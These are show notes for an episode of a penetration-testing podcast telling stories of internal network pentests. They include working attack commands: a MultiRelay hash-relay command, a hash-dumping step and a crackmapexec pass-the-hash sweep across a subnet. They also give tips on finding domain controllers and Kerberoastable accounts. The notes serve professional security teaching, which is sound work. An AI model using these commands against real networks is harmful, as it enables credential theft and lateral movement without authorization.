7MS #390: Tales of Internal Network Pentest Pwnage - Part 11
Dec 6, 2019 • 63 minutes
Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.
Today's episode is a twofer. That's right, two tales of internal network pentest pwnage. Whoop whoop! We cover:
What the SDAD (Single Domain Admin Dance) and DDAD (Double Domain Admin Dance) are (spoiler: imagine your dad trying to dance cool...it's like that, but more awkward)
A good way to quickly find domain controllers in your environment:
nslookup -type=SRV _ldap._tcp.dc._msdcs.YOURDOMAIN.SUFFIX
Early in the engagement I'd highly recommend checking for Kerberoastable accounts
I really like Multirelay to help me pass hashes, like:
MultiRelay.py -t 184.108.40.206 -u bob.admin Administrator yourmoms.admin
Once you get a shell, run
dump to dump hashes!
Then, use CME to pass that hash around the network!
crackmapexec smb 192.168.0.0/24 -u Administrator -H YOUR-HASH-GOES-HERE --local auth
Choose from the options below to listen and subscribe to 7 Minute Security in your podcast app of choice. By subscribing you will receive new episodes automatically.
Search for 7 Minute Security or copy the URL below and enter it in your podcast application.